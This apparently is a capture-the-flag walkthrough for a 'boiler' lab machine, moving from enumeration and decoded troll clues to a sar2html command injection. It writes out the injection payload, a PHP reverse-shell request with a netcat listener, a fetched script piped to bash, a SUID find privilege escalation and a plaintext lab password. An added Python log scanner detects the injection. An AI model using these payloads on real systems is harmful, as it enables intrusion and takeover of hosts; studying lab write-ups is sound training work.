Intermediate level CTF. Just enumerate, you’ll get there. Welp, let’s see if that’s true.


nmap says we’ve got 21 (FTP), 80 (HTTP), 10000 and 55007. Port 10000 is Webmin, and 55007 is SSH. Webmin is a web-based system configuration tool for Unix-like systems. Having SSH running on port 55007 is a timely reminder that just because it usually runs on port 22 doesn’t mean it has to.


The FTP server allows anonymous login, but nothing is obviously present. Checking with ls -lash, however, shows there is actually a hidden file. The content is:

Whfg jnagrq gb frr vs lbh svaq vg. Yby. Erzrzore: Rahzrengvba vf gur xrl!

This looks like a cipher, so we’ll decode it:

Just wanted to see if you find it. Lol. Remember: Enumeration is the key!

In this case the cipher was ROT13, and I’ve been trolled. :/


Visiting the webserver and checking robots.txt reveals several disallowed directories hinting at rabbit holes, and then provides a series of numbers:

079 084 108 105 077 068 089 050 077 071 078 107 079 084 086 104 090 071 086 104 077 122 073 051 089 122 085 048 077 084 103 121 089 109 070 104 078 084 069 049 079 068 081 075

Decoding decimal to ASCII gives:
Decoding from base64 gives:
Cracking the hash with john gives:
And again with the trolling. :/


Running dirbuster against the web service, we can see it’s running Joomla.

At /joomla/_files, we find this:
This is base64, and decodes to
Whopsie daisy.
Yes, trolled again. :/


At /joomla/_test/index.php we find something called sar2html. Running searchsploit shows there is an RCE vulnerability in it, and we can run some commands like this: ;whoami

In this way we can cat /etc/passwd, and see there are some users such as stoner and basterd.

We can also list the contents of /var/www/html/joomla, but more usefully we can use Burp repeater and get a reverse shell:

GET /joomla/_test/index.php?plot=;php+-r+'$sock%3dfsockopen("",1234)%3bexec("/bin/sh+-i+<%264+>%264+2>%264")%3b' HTTP/1.1

root@kali:/opt/tryhackme/boiler# nc -nvlp 1234
listening on [any] 1234 ...
connect to [] from (UNKNOWN) [] 54514
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash");'
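
The defender's view of the requests above, as an added example that is not part of the original writeup: a scan of web access logs for shell metacharacters in the plot parameter. The log lines are constructed, and the Apache common log format and the benign plot value are assumptions.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed sample in Apache common log format (not captured from the target).
# Client addresses come from the 192.0.2.0/24 documentation range.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2021:10:00:01 +0000] "GET /joomla/_test/index.php?plot=LINUX HTTP/1.1" 200 5120
192.0.2.44 - - [01/Jan/2021:10:02:13 +0000] "GET /joomla/_test/index.php?plot=;whoami HTTP/1.1" 200 5344
192.0.2.44 - - [01/Jan/2021:10:03:40 +0000] "GET /joomla/_test/index.php?plot=%3Bcat+/etc/passwd HTTP/1.1" 200 7012
192.0.2.10 - - [01/Jan/2021:10:05:00 +0000] "GET /joomla/index.php?option=com_content&view=article HTTP/1.1" 200 9001
"""

LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*"')
# Characters a shell treats as command separators, pipes, substitution or redirection.
SHELL_META = re.compile(r"[;|&`$<>\r\n]")
PARAM = "plot"  # the parameter used in the requests shown in this writeup


def param_values(target, name=PARAM):
    """Yield URL-decoded values of `name` from a request target."""
    # Split on '&' by hand: older urllib.parse versions also split on ';',
    # which would hide exactly the character we are looking for.
    for pair in urlsplit(target).query.split("&"):
        key, _, value = pair.partition("=")
        if unquote_plus(key) == name:
            yield unquote_plus(value)


def find_injection_attempts(log_text):
    """Return (client_ip, decoded_value) for each plot value containing shell metacharacters."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        for value in param_values(m.group("target")):
            if SHELL_META.search(value):
                hits.append((m.group("ip"), value))
    return hits


if __name__ == "__main__":
    for ip, value in find_injection_attempts(SAMPLE_LOG):
        print(f"{ip}\tplot={value!r}")
```

Values are URL-decoded before matching, so the percent-encoded request is flagged the same way as the raw one.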


Once we’re in, we can get linpeas and pipe it to bash:

www-data@Vulnerable:/dev/shm$ curl | /bin/bash

This tells us that /usr/bin/find is vulnerable. Checking GTFOBins, we can see what needs to be done:

www-data@Vulnerable:/dev/shm$ /usr/bin/find . -exec /bin/sh -p \; -quit
/usr/bin/find . -exec /bin/sh -p \; -quit

And with that we can obtain the flags.

Other Users

Doing some more enumeration now that we are root, we can see /home/basterd/, which contains credentials for stoner: USER=stoner:#superduperp@$$no1knows

The Shortcut

After I’d completed this, I checked someone else’s writeup and it seems like I was supposed to find a password in a file called log.txt with the sar2html exploit and then SSH in as basterd, then su to stoner, then do the find privesc. Oh well, nothing like taking a shortcut, that’s what hacking is yeah?